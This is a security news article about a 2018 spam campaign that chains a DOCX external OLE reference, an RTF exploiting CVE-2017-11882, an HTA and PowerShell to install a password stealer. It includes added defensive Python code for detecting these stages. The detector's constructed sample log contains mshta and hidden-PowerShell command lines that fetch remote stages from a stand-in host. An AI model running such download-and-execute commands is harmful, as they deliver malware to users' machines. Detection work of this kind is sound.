
New email spam campaign ditches traditional Office macro infection tactic

19 Feb 18

Researchers at Trustwave’s SpiderLabs Blog have spotted a wave of spam emails that use Microsoft Office documents to download password stealers without having to activate Macros.

Often malware will hide in infected Microsoft Office documents commonly attached to spam emails. That malware will be disguised as a downloader that is launched if a victim allows Macros in a malicious document.

This is a common sight in spam delivered from the Necurs botnet; however, a new sample has ditched the macro approach entirely and instead uses a Microsoft Office vulnerability to steal details from victims.

Researchers have been tracking an email spam campaign that uses a four-stage infection process to deliver attachments and then a password stealer.

That password stealer can also steal credentials from email clients, FTP and browser clients.

According to researchers, the spam campaign uses a number of different subject lines, often variations of the following:

  • TNT STATEMENT OF ACCOUNT – {random numbers}.
  • Request for Quotation (RFQ) - <{random numbers}>
  • Telex Transfer Notification
  • SWIFT COPY FOR BALANCE PAYMENT

Researchers explain:

“Word documents with Office 2007 Open XML Formats are based on XML and ZIP archive technologies. Anyone can easily manipulate data in a Word 2007 file programmatically or manually. As shown below, the DOCX attachment contains an embedded OLE object that has external references. This 'feature' allows external access to remote OLE objects to be referenced in the document.xml.rels.”

If a victim opens the document, it triggers the download and execution of a remote document file in the form of a rich text file (RTF).
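The indicator the researchers point to for the first stage is an external OLE reference in the document's relationship part. The following is an added example, not code from Trustwave or SpiderLabs: it scans a .docx (a ZIP of XML parts) for OLE relationships with `TargetMode="External"`, and builds a constructed sample document in memory to run against. The relationship-type URIs are the standard Open XML ones; the sample target URL is a placeholder.

```python
"""Static check for .docx files whose relationship parts reference an external
OLE object, the indicator described for the campaign's first stage.
Added example, not Trustwave/SpiderLabs code. The sample document is
constructed in memory; the relationship-type URIs are the standard Open XML
ones (assumed correct as written here)."""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
STYLES_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                   "relationships/styles")


def find_external_ole_relationships(docx_bytes):
    """Return (rels_part, rId, target) for every OLE relationship whose
    TargetMode is External. All *.rels parts under word/ are checked, not only
    document.xml.rels, because headers, footers and footnotes carry their own
    relationship files."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"):
                    hits.append((name, rel.get("Id"), rel.get("Target")))
    return hits


def build_sample_docx(external_target=None):
    """Construct a minimal .docx (not a real campaign file). When
    external_target is given, add an external OLE relationship pointing at it,
    mirroring the document.xml.rels entry the article describes."""
    rels = [f'<Relationship Id="rId1" Type="{STYLES_REL_TYPE}" '
            f'Target="styles.xml"/>']
    if external_target:
        rels.append(f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" '
                    f'Target="{external_target}" TargetMode="External"/>')
    document_rels = (f'<Relationships xmlns="{RELS_NS}">'
                     + "".join(rels) + "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")   # placeholder part
        z.writestr("word/document.xml", "<document/>")  # placeholder part
        z.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python check_docx.py file1.docx file2.docx ...
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for part, rid, target in find_external_ole_relationships(fh.read()):
                print(f"{path}: {part} {rid} -> {target}")
```

A mail-gateway or sandbox pre-filter can apply this check cheaply because it never renders the document; a hit does not prove maliciousness (legitimate linked objects exist), but an attachment from an unknown sender whose OLE target is a remote URL is worth quarantining for review.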

The RTF exploits the MS Equation Editor Tool and in turn downloads an MSHTA command line that leads to a remote HTA file. That HTA file eventually leads to VBScript with obfuscated code, and a PowerShell script that runs a remote binary file.

The binary file then executes the password stealer malware.
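The later stages of the chain (Equation Editor launching MSHTA, the HTA launching PowerShell) are visible as parent/child process relationships rather than as file content. The following is an added example, not Trustwave or SpiderLabs code: it parses a few constructed process-creation records and flags an Office process, the Equation Editor, or mshta spawning a script host. The image names (WINWORD.EXE, EQNEDT32.EXE, mshta.exe, powershell.exe) and the key=value line format are assumptions about how this chain would appear in endpoint telemetry.

```python
"""Behavioural check over process-creation telemetry for the later stages of
the chain: Office (or the Equation Editor it hosts) launching mshta, and mshta
launching PowerShell. Added example, not Trustwave/SpiderLabs code. The log
lines are constructed; the image names and the key=value line format are
assumptions about how this chain would appear in endpoint telemetry."""

# Parents that should not normally be launching script hosts (assumed names).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                      "eqnedt32.exe", "mshta.exe"}
# Script hosts and LOLBins the article's chain relies on (assumed names).
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "wscript.exe",
                       "cscript.exe"}

# Constructed sample telemetry: an ordinary Word launch, a benign Word child,
# then the Equation Editor -> mshta -> powershell sequence.
SAMPLE_LOG = r"""
ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|CommandLine="WINWORD.EXE" TNT_STATEMENT.docx
ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|Image=C:\Windows\splwow64.exe|CommandLine=splwow64.exe 12288
ParentImage=C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta http://example.invalid/stage3.hta
ParentImage=C:\Windows\System32\mshta.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -c (constructed stage-4 download)
"""


def parse_events(text):
    """Parse 'Key=Value|Key=Value' lines into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(part.split("=", 1) for part in line.split("|"))
        events.append(fields)
    return events


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_script_host_chain(events):
    """Return (parent, child, command_line) for each suspicious spawn."""
    alerts = []
    for ev in events:
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        if parent in SUSPICIOUS_PARENTS and child in SUSPICIOUS_CHILDREN:
            alerts.append((parent, child, ev.get("CommandLine", "")))
    return alerts


if __name__ == "__main__":
    for parent, child, cmd in detect_script_host_chain(parse_events(SAMPLE_LOG)):
        print(f"ALERT {parent} -> {child}: {cmd}")
```

Matching on the parent/child pair rather than on any single file type is the point: the researchers note that DOCX, RTF and HTA are rarely blocked at the gateway, but none of those stages can progress without a script host being spawned from a document-rendering process, which is the behaviour this rule keys on.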

The entire process draws on a Microsoft Office vulnerability discovered in July 2017. The vulnerability, CVE-2017-11882, affects multiple Microsoft Office platforms including Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016.

Because the affected software fails to properly handle objects in memory, attackers can run arbitrary code; Microsoft classes the flaw as a Microsoft Office Memory Corruption vulnerability.

“It's pretty unusual to find so many stages and vectors being used to download malware,” researchers comment.

“This approach can be very risky for the malware author. If any one stage fails, it will have a domino effect on the whole process. Another noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF.”
